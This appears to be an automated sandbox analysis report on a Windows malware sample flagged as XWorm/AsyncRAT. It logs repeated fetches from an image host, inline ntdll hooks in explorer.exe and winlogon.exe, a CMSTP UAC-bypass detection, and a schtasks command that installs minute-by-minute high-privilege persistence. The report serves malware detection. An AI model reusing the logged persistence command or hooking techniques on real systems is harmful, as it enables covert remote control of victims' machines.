                                                                                                                                                                                                                                              2024-10-15 09:21:23 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              24192.168.2.752487162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:21:25 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              25192.168.2.752489162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:21:28 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              26192.168.2.752490162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:21:29 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              27192.168.2.752491162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:21:33 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              28192.168.2.752492162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:21:34 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              29192.168.2.752493162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:21:37 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              30192.168.2.752495162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:21:52 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              31192.168.2.752496162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:21:55 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              32192.168.2.752497162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:22:01 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              33192.168.2.752498162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:22:04 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              34192.168.2.752499162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:22:06 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              35192.168.2.752500162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:22:09 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              36192.168.2.752501162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:22:10 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              37192.168.2.752502162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:22:13 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              38192.168.2.752503162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:22:14 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              39192.168.2.752504162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:22:23 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              40192.168.2.752505162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:22:24 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              41192.168.2.752506162.19.58.157443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:22:27 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              42192.168.2.752507162.19.58.157443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:22:34 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              43192.168.2.752509162.19.58.157443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:22:37 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              44192.168.2.752510162.19.58.157443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:22:39 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Code Manipulations

                                                                                                                                                                                                                                              User Modules

                                                                                                                                                                                                                                              Hook Summary

                                                                                                                                                                                                                                              Function NameHook TypeActive in Processes
                                                                                                                                                                                                                                              ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                                                                                                                                                                                                              NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                                                                                                                                                                                                              ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                                                                                                                                                                                                                                              NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                                                                                                                                                                                                              ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                                                                                                                                                                                                              NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                                                                                                                                                                                                              NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                                                                                                                                                                                                              ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                                                                                                                                                                                                              ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                                                                                                                                                                                                              NtResumeThreadINLINEexplorer.exe, winlogon.exe
                                                                                                                                                                                                                                              RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                                                                                                                                                                                                                                              NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                                                                                                                                                                                                              NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                                                                                                                                                                                                              ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                                                                                                                                                                                                              ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe

                                                                                                                                                                                                                                              Processes

                                                                                                                                                                                                                                              Process: explorer.exe, Module: ntdll.dll
                                                                                                                                                                                                                                              Function NameHook TypeNew Data
                                                                                                                                                                                                                                              ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                                                                                                                              NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                                                                                                              ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                                                                                                                              NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                                                                                                                              ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                                                                                                                              NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                                                                                                                              NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                                                                                                                                                              ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                                                                                                                              ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                                                                                                              NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                                                                                                                              RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                                                                                                              NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                                                                                                                              NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                                                                                                                              ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                                                                                                                              ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                                                                                                                                                              Process: winlogon.exe, Module: ntdll.dll
                                                                                                                                                                                                                                              Function NameHook TypeNew Data
                                                                                                                                                                                                                                              ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                                                                                                                              NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                                                                                                              ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                                                                                                                              NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                                                                                                                              ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                                                                                                                              NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                                                                                                                              NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                                                                                                                                                              ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                                                                                                                              ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                                                                                                              NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                                                                                                                              RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                                                                                                              NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                                                                                                                              NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                                                                                                                              ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                                                                                                                              ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                              Behavior

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                                                                              Start time:05:20:17
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\r8k29DBraE.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\r8k29DBraE.exe"
                                                                                                                                                                                                                                              Imagebase:0x2616cab0000
                                                                                                                                                                                                                                              File size:571'904 bytes
                                                                                                                                                                                                                                              MD5 hash:DC50BAFF9F1BAB10F1EBC24E0D77AFC3
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.1595934770.000002611005F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.1598581961.000002616E806000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                                              Start time:05:20:20
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\wzcsapi.exe"
                                                                                                                                                                                                                                              Imagebase:0x6d0000
                                                                                                                                                                                                                                              File size:34'816 bytes
                                                                                                                                                                                                                                              MD5 hash:64FFE7C0FA6AC22F5ACAFD3CEB4ACA5B
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.2674092147.000000001BEE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000003.00000002.2674092147.000000001BEE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000002.2674092147.000000001BEE0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.2644119365.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000002.2644119365.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                              • Detection: 83%, ReversingLabs
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                                              Start time:05:20:21
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\wzcsvc.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\wzcsvc.exe"
                                                                                                                                                                                                                                              Imagebase:0x7ff6b5ad0000
                                                                                                                                                                                                                                              File size:165'376 bytes
                                                                                                                                                                                                                                              MD5 hash:A69C6E092D415063A9FB80F8FE4E3444
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                              • Detection: 88%, ReversingLabs
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                                              Start time:05:20:21
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                                              Start time:05:20:21
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\winlogon.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:winlogon.exe
                                                                                                                                                                                                                                              Imagebase:0x7ff6fc1b0000
                                                                                                                                                                                                                                              File size:906'240 bytes
                                                                                                                                                                                                                                              MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                                              Start time:05:20:21
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\WerFault.exe -pss -s 432 -p 1408 -ip 1408
                                                                                                                                                                                                                                              Imagebase:0x7ff683ca0000
                                                                                                                                                                                                                                              File size:570'736 bytes
                                                                                                                                                                                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                                              Start time:05:20:21
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 1408 -s 1088
                                                                                                                                                                                                                                              Imagebase:0x7ff683ca0000
                                                                                                                                                                                                                                              File size:570'736 bytes
                                                                                                                                                                                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                                              Start time:05:20:21
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\lsass.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\lsass.exe
                                                                                                                                                                                                                                              Imagebase:0x7ff6d9390000
                                                                                                                                                                                                                                              File size:59'456 bytes
                                                                                                                                                                                                                                              MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                                              Start time:05:20:22
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                                              Start time:05:20:22
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                                                              Start time:05:20:23
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "wzcsapi" /tr "%Current%\wzcsapi.exe"
                                                                                                                                                                                                                                              Imagebase:0x7ff74bbf0000
                                                                                                                                                                                                                                              File size:235'008 bytes
                                                                                                                                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                                              Start time:05:20:23
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                                                              Start time:05:20:23
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\dwm.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"dwm.exe"
                                                                                                                                                                                                                                              Imagebase:0x7ff74b010000
                                                                                                                                                                                                                                              File size:94'720 bytes
                                                                                                                                                                                                                                              MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                                              Start time:05:20:26
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
